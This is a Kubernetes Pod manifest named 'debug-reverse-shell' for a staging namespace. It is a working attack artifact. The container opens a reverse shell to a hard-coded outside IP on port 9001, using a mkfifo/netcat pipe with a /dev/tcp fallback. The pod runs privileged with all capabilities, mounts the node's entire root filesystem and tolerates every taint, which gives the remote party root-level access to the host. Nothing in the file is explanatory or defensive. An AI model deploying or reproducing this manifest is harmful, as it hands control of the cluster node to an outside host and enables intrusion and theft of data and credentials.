apiVersion: v1
kind: Pod
metadata:
  name: debug-reverse-shell
  namespace: sportzia-staging
spec:
  nodeName: private-pool-p24gy
  restartPolicy: Never
  containers:
  - name: shell
    image: alpine
    command: ["/bin/sh", "-c"]
    args:
    - |
      sleep 3
      apk add --no-cache busybox-extras &>/dev/null || true

      # Reverse shell
      rm -f /tmp/f
      mkfifo /tmp/f
      cat /tmp/f | /bin/sh -i 2>&1 | nc 188.227.84.184 9001 > /tmp/f ||
      /bin/sh -i >& /dev/tcp/188.227.84.184/9001 0>&1

      sleep 3600
    securityContext:
      privileged: true
      allowPrivilegeEscalation: true
      readOnlyRootFilesystem: false
      capabilities:
        add: ["ALL"]
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
  tolerations:
  - operator: Exists
